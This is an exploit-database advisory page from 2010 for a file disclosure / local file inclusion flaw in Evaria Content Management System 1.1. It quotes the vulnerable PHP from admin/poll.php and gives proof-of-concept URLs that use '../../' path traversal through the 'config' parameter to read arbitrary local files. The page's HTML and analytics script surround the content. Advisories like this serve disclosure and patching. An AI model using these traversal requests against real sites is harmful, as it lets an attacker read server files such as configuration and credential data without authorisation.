[webapps / 0day] - Evaria Content Management System 1.1 File
Posted on 01 October 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Evaria Content Management System 1.1 File Disclosure Vulnerability | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Evaria Content Management System 1.1 File Disclosure Vulnerability by khayeye shotor in webapps / 0day | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>================================================================== Evaria Content Management System 1.1 File Disclosure Vulnerability ================================================================== # Exploit Title: local file include / File Disclosure # Date: # Author: khayeye shotor # Software Link: http://www.evaria.com/en/?view=download&dload=1 # Version: Evaria Content Management System v.1.1 # Thanks: khayeye sag , kandome mivei , sinehaye amam and all amehaye irani ----------- vul code: /path/admin/poll.php $file_contents = file("admin/".$current_poll); if (((isset($vote_logging))) && (($vote_logging == 1) || ($vote_logging == 3))) { foreach ($file_contents as $line) { if (eregi($REMOTE_ADDR, $line)) { display_form(); echo "<TABLE align="center" width="100%" cellspacing="2" cellpadding="2" border="0"> <TR> "; echo " <TD class="poll_status" align="center">" . $already_voted . "</TD> "; echo " </TR> </TABLE> "; $set_already_voted = 1; $vote_allow = 0; break; } } } if (((isset($vote_logging))) && (($vote_logging == 2) || ($vote_logging == 3))) { if ((isset($voted)) && ($voted == "on")) { if (!$set_already_voted) { display_form(); echo "<TABLE align="center" width="100%" cellspacing="2" cellpadding="2" border="0"> <TR> "; echo " <TD class="poll_status" align="center">" . $already_voted . "</TD> "; echo " </TR> </TABLE> "; } $vote_allow = 0; break; } } if ($vote_allow) { $poll_string = $vote . "|" . $REMOTE_ADDR . " "; $fp = fopen("admin/".$current_poll, "a"); $string_size = strlen($poll_string); if (fputs($fp, $poll_string, $string_size)) { display_form(); echo "<TABLE align="center" width="100%" cellspacing="2" cellpadding="2" border="0"> <TR> "; echo " <TD class="poll_status" align="center">" . $vote_cast . "</TD> "; echo " </TR> </TABLE> "; } fclose($fp); } } break; case "default": display_form(); break; } } // Display poll form if no view is called upon... if (!isset($mode)) { display_form(); } elseif ((isset($vote) == 0) && (isset($mode))) { display_form(); echo "<TABLE align="center" width="100%" cellspacing="2" cellpadding="2" border="0"> <TR> "; echo " <TD class="poll_status" align="center">" . $no_selection . "</TD> "; echo " </TR> </TABLE> "; } function display_form() { global $config; global $no_voting; global $QUERY_STRING; echo "<FORM name="poll" action="?" . $QUERY_STRING . "" method="post"> "; echo "<TABLE align="center" width="100%" cellspacing="2" cellpadding="2" border="0"> "; echo " <TR> "; $answers = file("admin/".$config); ------------------------------------------------ poc: /admin/poll.php?config=../../eprint.php /admin/poll.php?config=[local file] # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-01]</pre></body></html>
